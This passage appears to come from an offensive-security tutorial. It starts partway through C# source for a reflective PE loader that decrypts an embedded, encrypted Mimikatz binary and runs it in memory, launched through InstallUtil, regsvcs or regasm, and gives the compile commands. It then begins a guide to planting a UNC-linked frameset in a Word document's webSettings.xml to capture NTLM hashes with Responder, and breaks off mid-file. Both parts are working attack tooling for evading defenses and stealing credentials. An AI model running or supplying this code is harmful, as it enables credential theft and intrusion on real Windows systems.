    //Executes UnRegisterClass If you don't have permissions
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe /U katz.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U katz.exe
    xC:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U katz.exe
    //This calls the UnregisterClass Method
    
    [OR]
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U katz.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U katz.exe
    
    
    
    */
    
    
    // Find/Replace All "password"
    // Find "SALT" and update those bytes
    
    namespace Delivery
    {
    
        public class Program
        {
            public static void Main(string[] args)
            {
                if(args.Length == 2) {
                    if(args[0] == "encrypt") {
                        String file = args[1];
    
                        //Example Extract Files and Encrypt.  Ideally you would compress.  But .NET 2 doesn't have really good Compression Libraries..
                        //byte[] b  = Misc.FileToByteArray(@"mimikatz64.exe");
                        byte[] b  = Misc.FileToByteArray(@file);
                        byte[] e = Misc.Encrypt(b,"password");
                        string f = System.Convert.ToBase64String(e);
                        File.WriteAllText(@"file.b64",f);
                        Console.WriteLine("{0}", f);
    
                        /*
                        byte[] b1  = Misc.FileToByteArray(@"mimikatzx86.exe");
                        byte[] e1 = Misc.Encrypt(b1,"password");
                        string f1 = System.Convert.ToBase64String(e1);
                        File.WriteAllText(@"filex86.b64",f1);
                */
    
                    }
                else {
                    //Add any behaviour here to throw off sandbox execution/analysts :)
                    Katz.Exec();
    
                }
    
            }
    
        }
    
    
        [System.ComponentModel.RunInstaller(true)]
        public class Sample : System.Configuration.Install.Installer
        {
            //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.
            public override void Uninstall(System.Collections.IDictionary savedState)
            {
    
                //Console.WriteLine("Hello There From Uninstall");
                Katz.Exec();
    
            }
    
        }
    
        public class Bypass : ServicedComponent
        {
            public Bypass() { //Console.WriteLine("I am a basic COM Object"); }
    
            [ComRegisterFunction] //This executes if registration is successful
            public static void RegisterClass(string key)
            {
                Katz.Exec();
            }
    
            [ComUnregisterFunction] //This executes if registration fails
            public static void UnRegisterClass(string key)
            {
                Katz.Exec();
            }
        }
    
    
    
        public class Katz
        {
            //Since .NET 2 doesn't have a method for this, this should do the trick...
            public static IntPtr IntPtrAdd(IntPtr a, int b)
            {
                IntPtr ptr = new IntPtr(a.ToInt64() + b);
                return ptr;
            }
    
            public static void Exec()
            {
    
    
                byte[] latestMimikatz = null;
                try
                {
    
                    //Use Misc Class to encrypt your own files
    
    
    
                    if (IntPtr.Size == 8 )
                    {
                        //x64 Unpack And Execute
                        latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex64), "password"); //Yes, this is a bad idea.
    
                    }
                    else if (IntPtr.Size == 4 )
                    {
                        //x86 Unpack And Execute
                        latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex86), "password"); //Yes, this is a bad idea.
    
                    }
    
    
    
                }
                catch (Exception ex)
                {
                    while (ex != null)
                    {
                        //Console.WriteLine(ex.Message);
                        ex = ex.InnerException;
                    }
                }
    
                //Console.WriteLine("Downloaded Latest");
                PELoader pe = new PELoader(latestMimikatz);
    
    
    
                IntPtr codebase = IntPtr.Zero;
    
                if (pe.Is32BitHeader)
                {
                    //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
                    codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
                }
                else
                {
                    //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
                    codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
                }
    
    
    
                //Copy Sections
                for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
                {
    
                    IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
                    //Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
                }
    
                //Perform Base Relocation
                //Calculate Delta
                IntPtr currentbase = codebase;
                long delta;
                if (pe.Is32BitHeader)
                {
    
                    delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
                }
                else
                {
    
                    delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
                }
    
                //Console.WriteLine("Delta = {0}", delta.ToString("X4"));
    
                //Modify Memory Based On Relocation Table
                IntPtr relocationTable;
                if (pe.Is32BitHeader)
                {
                    relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
                }
                else
                {
                    relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
                }
    
    
                NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
                relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
    
                int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
                IntPtr nextEntry = relocationTable;
                int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
                IntPtr offset = relocationTable;
    
                while (true)
                {
    
                    NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
                    IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock);
                    relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
    
                    IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress);
    
                    for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
                    {
    
                        IntPtr patchAddr;
                        UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
    
                        UInt16 type = (UInt16)(value >> 12);
                        UInt16 fixup = (UInt16)(value & 0xfff);
    
                        switch (type)
                        {
                            case 0x0:
                                break;
                            case 0x3:
                                patchAddr = IntPtrAdd(dest, fixup);
                                //Add Delta To Location.
                                int originalx86Addr = Marshal.ReadInt32(patchAddr);
                                Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
                                break;
                            case 0xA:
                                patchAddr = IntPtrAdd(dest, fixup);
                                //Add Delta To Location.
                                long originalAddr = Marshal.ReadInt64(patchAddr);
                                Marshal.WriteInt64(patchAddr, originalAddr + delta);
                                break;
    
                        }
    
                    }
    
                    offset = IntPtrAdd(relocationTable, sizeofNextBlock);
                    sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
                    relocationEntry = relocationNextEntry;
    
                    nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock);
    
                    if (relocationNextEntry.SizeOfBlock == 0) break;
    
    
                }
    
    
                //Resolve Imports
    
                IntPtr z;
                IntPtr oa1;
                int oa2;
    
                if (pe.Is32BitHeader)
                {
                    z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                    oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                    oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
                }
                else
                {
                    z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                    oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                    oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
                }
    
    
    
                //Get And Display Each DLL To Load
    
                IntPtr threadStart;
                IntPtr hThread;
                if (pe.Is32BitHeader)
                {
                    int j = 0;
                    while (true) //HardCoded Number of DLL's Do this Dynamically.
                    {
                        IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                        int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                        IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
                        IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                        string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
                        if (DllName == "") { break; }
    
                        IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                        //Console.WriteLine("Loaded {0}", DllName);
                        int k = 0;
                        while (true)
                        {
                            IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                            string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                            IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                            Marshal.WriteInt32(a2, (int)funcAddy);
                            a2 = IntPtrAdd(a2, 4);
                            if (DllFuncName == "") break;
                            k++;
                        }
                        j++;
                    }
                    //Transfer Control To OEP
                    //Console.WriteLine("Executing Mimikatz");
                    threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
                    hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                    NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
    
                    //Console.WriteLine("Thread Complete");
                }
                else
                {
                    int j = 0;
                    while (true)
                    {
                        IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                        int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                        IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
                        IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                        string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
                        if (DllName == "") { break; }
    
                        IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                        //Console.WriteLine("Loaded {0}", DllName);
                        int k = 0;
                        while (true)
                        {
                            IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                            string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                            ////Console.WriteLine("Function {0}", DllFuncName);
                            IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                            Marshal.WriteInt64(a2, (long)funcAddy);
                            a2 = IntPtrAdd(a2, 8);
                            if (DllFuncName == "") break;
                            k++;
                        }
                        j++;
                    }
                    //Transfer Control To OEP
                    //Console.WriteLine("Executing Mimikatz");
                    threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
                    hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                    NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
    
                    //Console.WriteLine("Thread Complete");
                }
    
                //Transfer Control To OEP
    
                //Console.WriteLine("Thread Complete");
                //Console.ReadLine();
    
    
    
    
            } //End Main
    
    
    
        }//End Program
    
        public class PELoader
        {
            public struct IMAGE_DOS_HEADER
            {      // DOS .EXE header
                public UInt16 e_magic;              // Magic number
                public UInt16 e_cblp;               // Bytes on last page of file
                public UInt16 e_cp;                 // Pages in file
                public UInt16 e_crlc;               // Relocations
                public UInt16 e_cparhdr;            // Size of header in paragraphs
                public UInt16 e_minalloc;           // Minimum extra paragraphs needed
                public UInt16 e_maxalloc;           // Maximum extra paragraphs needed
                public UInt16 e_ss;                 // Initial (relative) SS value
                public UInt16 e_sp;                 // Initial SP value
                public UInt16 e_csum;               // Checksum
                public UInt16 e_ip;                 // Initial IP value
                public UInt16 e_cs;                 // Initial (relative) CS value
                public UInt16 e_lfarlc;             // File address of relocation table
                public UInt16 e_ovno;               // Overlay number
                public UInt16 e_res_0;              // Reserved words
                public UInt16 e_res_1;              // Reserved words
                public UInt16 e_res_2;              // Reserved words
                public UInt16 e_res_3;              // Reserved words
                public UInt16 e_oemid;              // OEM identifier (for e_oeminfo)
                public UInt16 e_oeminfo;            // OEM information; e_oemid specific
                public UInt16 e_res2_0;             // Reserved words
                public UInt16 e_res2_1;             // Reserved words
                public UInt16 e_res2_2;             // Reserved words
                public UInt16 e_res2_3;             // Reserved words
                public UInt16 e_res2_4;             // Reserved words
                public UInt16 e_res2_5;             // Reserved words
                public UInt16 e_res2_6;             // Reserved words
                public UInt16 e_res2_7;             // Reserved words
                public UInt16 e_res2_8;             // Reserved words
                public UInt16 e_res2_9;             // Reserved words
                public UInt32 e_lfanew;             // File address of new exe header
            }
    
            [StructLayout(LayoutKind.Sequential)]
            public struct IMAGE_DATA_DIRECTORY
            {
                public UInt32 VirtualAddress;
                public UInt32 Size;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_OPTIONAL_HEADER32
            {
                public UInt16 Magic;
                public Byte MajorLinkerVersion;
                public Byte MinorLinkerVersion;
                public UInt32 SizeOfCode;
                public UInt32 SizeOfInitializedData;
                public UInt32 SizeOfUninitializedData;
                public UInt32 AddressOfEntryPoint;
                public UInt32 BaseOfCode;
                public UInt32 BaseOfData;
                public UInt32 ImageBase;
                public UInt32 SectionAlignment;
                public UInt32 FileAlignment;
                public UInt16 MajorOperatingSystemVersion;
                public UInt16 MinorOperatingSystemVersion;
                public UInt16 MajorImageVersion;
                public UInt16 MinorImageVersion;
                public UInt16 MajorSubsystemVersion;
                public UInt16 MinorSubsystemVersion;
                public UInt32 Win32VersionValue;
                public UInt32 SizeOfImage;
                public UInt32 SizeOfHeaders;
                public UInt32 CheckSum;
                public UInt16 Subsystem;
                public UInt16 DllCharacteristics;
                public UInt32 SizeOfStackReserve;
                public UInt32 SizeOfStackCommit;
                public UInt32 SizeOfHeapReserve;
                public UInt32 SizeOfHeapCommit;
                public UInt32 LoaderFlags;
                public UInt32 NumberOfRvaAndSizes;
    
                public IMAGE_DATA_DIRECTORY ExportTable;
                public IMAGE_DATA_DIRECTORY ImportTable;
                public IMAGE_DATA_DIRECTORY ResourceTable;
                public IMAGE_DATA_DIRECTORY ExceptionTable;
                public IMAGE_DATA_DIRECTORY CertificateTable;
                public IMAGE_DATA_DIRECTORY BaseRelocationTable;
                public IMAGE_DATA_DIRECTORY Debug;
                public IMAGE_DATA_DIRECTORY Architecture;
                public IMAGE_DATA_DIRECTORY GlobalPtr;
                public IMAGE_DATA_DIRECTORY TLSTable;
                public IMAGE_DATA_DIRECTORY LoadConfigTable;
                public IMAGE_DATA_DIRECTORY BoundImport;
                public IMAGE_DATA_DIRECTORY IAT;
                public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
                public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
                public IMAGE_DATA_DIRECTORY Reserved;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_OPTIONAL_HEADER64
            {
                public UInt16 Magic;
                public Byte MajorLinkerVersion;
                public Byte MinorLinkerVersion;
                public UInt32 SizeOfCode;
                public UInt32 SizeOfInitializedData;
                public UInt32 SizeOfUninitializedData;
                public UInt32 AddressOfEntryPoint;
                public UInt32 BaseOfCode;
                public UInt64 ImageBase;
                public UInt32 SectionAlignment;
                public UInt32 FileAlignment;
                public UInt16 MajorOperatingSystemVersion;
                public UInt16 MinorOperatingSystemVersion;
                public UInt16 MajorImageVersion;
                public UInt16 MinorImageVersion;
                public UInt16 MajorSubsystemVersion;
                public UInt16 MinorSubsystemVersion;
                public UInt32 Win32VersionValue;
                public UInt32 SizeOfImage;
                public UInt32 SizeOfHeaders;
                public UInt32 CheckSum;
                public UInt16 Subsystem;
                public UInt16 DllCharacteristics;
                public UInt64 SizeOfStackReserve;
                public UInt64 SizeOfStackCommit;
                public UInt64 SizeOfHeapReserve;
                public UInt64 SizeOfHeapCommit;
                public UInt32 LoaderFlags;
                public UInt32 NumberOfRvaAndSizes;
    
                public IMAGE_DATA_DIRECTORY ExportTable;
                public IMAGE_DATA_DIRECTORY ImportTable;
                public IMAGE_DATA_DIRECTORY ResourceTable;
                public IMAGE_DATA_DIRECTORY ExceptionTable;
                public IMAGE_DATA_DIRECTORY CertificateTable;
                public IMAGE_DATA_DIRECTORY BaseRelocationTable;
                public IMAGE_DATA_DIRECTORY Debug;
                public IMAGE_DATA_DIRECTORY Architecture;
                public IMAGE_DATA_DIRECTORY GlobalPtr;
                public IMAGE_DATA_DIRECTORY TLSTable;
                public IMAGE_DATA_DIRECTORY LoadConfigTable;
                public IMAGE_DATA_DIRECTORY BoundImport;
                public IMAGE_DATA_DIRECTORY IAT;
                public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
                public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
                public IMAGE_DATA_DIRECTORY Reserved;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_FILE_HEADER
            {
                public UInt16 Machine;
                public UInt16 NumberOfSections;
                public UInt32 TimeDateStamp;
                public UInt32 PointerToSymbolTable;
                public UInt32 NumberOfSymbols;
                public UInt16 SizeOfOptionalHeader;
                public UInt16 Characteristics;
            }
    
            [StructLayout(LayoutKind.Explicit)]
            public struct IMAGE_SECTION_HEADER
            {
                [FieldOffset(0)]
                [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
                public char[] Name;
                [FieldOffset(8)]
                public UInt32 VirtualSize;
                [FieldOffset(12)]
                public UInt32 VirtualAddress;
                [FieldOffset(16)]
                public UInt32 SizeOfRawData;
                [FieldOffset(20)]
                public UInt32 PointerToRawData;
                [FieldOffset(24)]
                public UInt32 PointerToRelocations;
                [FieldOffset(28)]
                public UInt32 PointerToLinenumbers;
                [FieldOffset(32)]
                public UInt16 NumberOfRelocations;
                [FieldOffset(34)]
                public UInt16 NumberOfLinenumbers;
                [FieldOffset(36)]
                public DataSectionFlags Characteristics;
    
                public string Section
                {
                    get { return new string(Name); }
                }
            }
    
            [StructLayout(LayoutKind.Sequential)]
            public struct IMAGE_BASE_RELOCATION
            {
                public uint VirtualAdress;
                public uint SizeOfBlock;
            }
    
            [Flags]
            public enum DataSectionFlags : uint
            {
    
                Stub = 0x00000000,
    
            }
    
    
            /// The DOS header
    
            private IMAGE_DOS_HEADER dosHeader;
    
            /// The file header
    
            private IMAGE_FILE_HEADER fileHeader;
    
            /// Optional 32 bit file header
    
            private IMAGE_OPTIONAL_HEADER32 optionalHeader32;
    
            /// Optional 64 bit file header
    
            private IMAGE_OPTIONAL_HEADER64 optionalHeader64;
    
            /// Image Section headers. Number of sections is in the file header.
    
            private IMAGE_SECTION_HEADER[] imageSectionHeaders;
    
            private byte[] rawbytes;
    
    
    
            public PELoader(string filePath)
            {
                // Read in the DLL or EXE and get the timestamp
                using (FileStream stream = new FileStream(filePath, System.IO.FileMode.Open, System.IO.FileAccess.Read))
                {
                    BinaryReader reader = new BinaryReader(stream);
                    dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
    
                    // Add 4 bytes to the offset
                    stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
    
                    UInt32 ntHeadersSignature = reader.ReadUInt32();
                    fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
                    if (this.Is32BitHeader)
                    {
                        optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
                    }
                    else
                    {
                        optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
                    }
    
                    imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
                    for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
                    {
                        imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
                    }
    
    
    
                    rawbytes = System.IO.File.ReadAllBytes(filePath);
    
                }
            }
    
            public PELoader(byte[] fileBytes)
            {
                // Read in the DLL or EXE and get the timestamp
                using (MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length))
                {
                    BinaryReader reader = new BinaryReader(stream);
                    dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
    
                    // Add 4 bytes to the offset
                    stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
    
                    UInt32 ntHeadersSignature = reader.ReadUInt32();
                    fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
                    if (this.Is32BitHeader)
                    {
                        optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
                    }
                    else
                    {
                        optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
                    }
    
                    imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
                    for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
                    {
                        imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
                    }
    
    
                    rawbytes = fileBytes;
    
                }
            }
    
    
            public static T FromBinaryReader<T>(BinaryReader reader)
            {
                // Read in a byte array
                byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T)));
    
                // Pin the managed memory while, copy it out the data, then unpin it
                GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
                T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
                handle.Free();
    
                return theStructure;
            }
    
    
    
            public bool Is32BitHeader
            {
                get
                {
                    UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
                    return (IMAGE_FILE_32BIT_MACHINE & FileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
                }
            }
    
    
            public IMAGE_FILE_HEADER FileHeader
            {
                get
                {
                    return fileHeader;
                }
            }
    
    
            /// Gets the optional header
    
            public IMAGE_OPTIONAL_HEADER32 OptionalHeader32
            {
                get
                {
                    return optionalHeader32;
                }
            }
    
    
            /// Gets the optional header
    
            public IMAGE_OPTIONAL_HEADER64 OptionalHeader64
            {
                get
                {
                    return optionalHeader64;
                }
            }
    
            public IMAGE_SECTION_HEADER[] ImageSectionHeaders
            {
                get
                {
                    return imageSectionHeaders;
                }
            }
    
            public byte[] RawBytes
            {
                get
                {
                    return rawbytes;
                }
    
            }
    
        }//End Class
    
    
        unsafe class NativeDeclarations
        {
    
            public static uint MEM_COMMIT = 0x1000;
            public static uint MEM_RESERVE = 0x2000;
            public static uint PAGE_EXECUTE_READWRITE = 0x40;
            public static uint PAGE_READWRITE = 0x04;
    
            [StructLayout(LayoutKind.Sequential)]
            public unsafe struct IMAGE_BASE_RELOCATION
            {
                public uint VirtualAdress;
                public uint SizeOfBlock;
            }
    
            [DllImport("kernel32")]
            public static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect);
    
            [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
            public static extern IntPtr LoadLibrary(string lpFileName);
    
            [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
            public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    
            [DllImport("kernel32")]
            public static extern IntPtr CreateThread(
    
              IntPtr lpThreadAttributes,
              uint dwStackSize,
              IntPtr lpStartAddress,
              IntPtr param,
              uint dwCreationFlags,
              IntPtr lpThreadId
              );
    
            [DllImport("kernel32")]
            public static extern UInt32 WaitForSingleObject(
    
              IntPtr hHandle,
              UInt32 dwMilliseconds
              );
    
            [StructLayout(LayoutKind.Sequential)]
            public unsafe struct IMAGE_IMPORT_DESCRIPTOR
            {
                public uint OriginalFirstThunk;
                public uint TimeDateStamp;
                public uint ForwarderChain;
                public uint Name;
                public uint FirstThunk;
            }
    
    
        }
    
        public class Misc
        {
            //Change This!
            private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
    
            public static void Stage(string fileName, string Key, string outFile)
            {
    
                byte[] raw = FileToByteArray(fileName);
                byte[] file = Encrypt(raw, Key);
    
                FileStream fileStream = File.Create(outFile);
    
                fileStream.Write(file, 0, file.Length);//Write stream to temp file
    
                //Console.WriteLine("File Ready, Now Deliver Payload");
    
            }
    
            public static byte[] FileToByteArray(string _FileName)
            {
                byte[] _Buffer = null;
                System.IO.FileStream _FileStream = new System.IO.FileStream(_FileName, System.IO.FileMode.Open, System.IO.FileAccess.Read);
                System.IO.BinaryReader _BinaryReader = new System.IO.BinaryReader(_FileStream);
                long _TotalBytes = new System.IO.FileInfo(_FileName).Length;
                _Buffer = _BinaryReader.ReadBytes((Int32)_TotalBytes);
                _FileStream.Close();
                _FileStream.Dispose();
                _BinaryReader.Close();
                return _Buffer;
            }
    
            public static byte[] Encrypt(byte[] plain, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(plain, 0, plain.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
            public static byte[] Decrypt(byte[] cipher, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(cipher, 0, cipher.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
    
            public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
            {
                byte[] buffer = new byte[16 * 1024];
                using (MemoryStream ms = new MemoryStream())
                {
                    int read;
                    while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        ms.Write(buffer, 0, read);
                    }
                    return ms.ToArray();
                }
            }
    
        }//End Misc Class
    
        public class Package
        {
            public static string filex86 = @"INSERT B64 HERE";
            public static string filex64 = @"INSERT B64 HERE";
    
        }
    }
    

    Next, compile the .cs file. First generate key.snk:

    $key = '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'
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
    

    Compile the exe:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    

    Once compiled it can be run directly, or loaded via regsvcs.exe, regasm.exe or InstallUtil.exe.




    Someone previously summarized many methods of stealing NTLM hashes (original, translation). That write-up already covers a lot of methods; I recently learned a new one, so I am sharing it here as a supplement.

    Historically, Microsoft Word has been used as an HTML editor. This means it supports HTML elements such as framesets. Consequently, a Microsoft Word document can be linked to a UNC path and, combined with Responder, used to capture NTLM hashes from outside. A Word document with the docx extension is actually a zip file containing various XML documents. These XML files control the theme, fonts, document settings and web settings.

    So we can create any new document and open it with an archive tool.


    Under the word directory there is a webSettings.xml. We modify this file; adding the following code creates a link to another file.

    <w:frameset>
    <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
    <w:frame>
    <w:name w:val="3"/>
    <w:sourceFileName r:id="rId1"/>
    <w:linkedToFile/>
    </w:frame>
    </w:frameset>
    </w:frameset>
    

    The final modified webSettings.xml looks like this:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
        <w:frameset>
    <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
    <w:frame>
    <w:name w:val="3"/>
    <w:sourceFileName r:id="rId1"/>
    <w:linkedToFile/>
    </w:frame>
    </w:frameset>
    </w:frameset>
    <w:optimizeForBrowser/><w:allowPNG/></w:webSettings>
    

    Now replace the original webSettings.xml with the new one, then create a new file webSettings.xml.rels in the _rels directory under word, with the following contents:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships
    xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
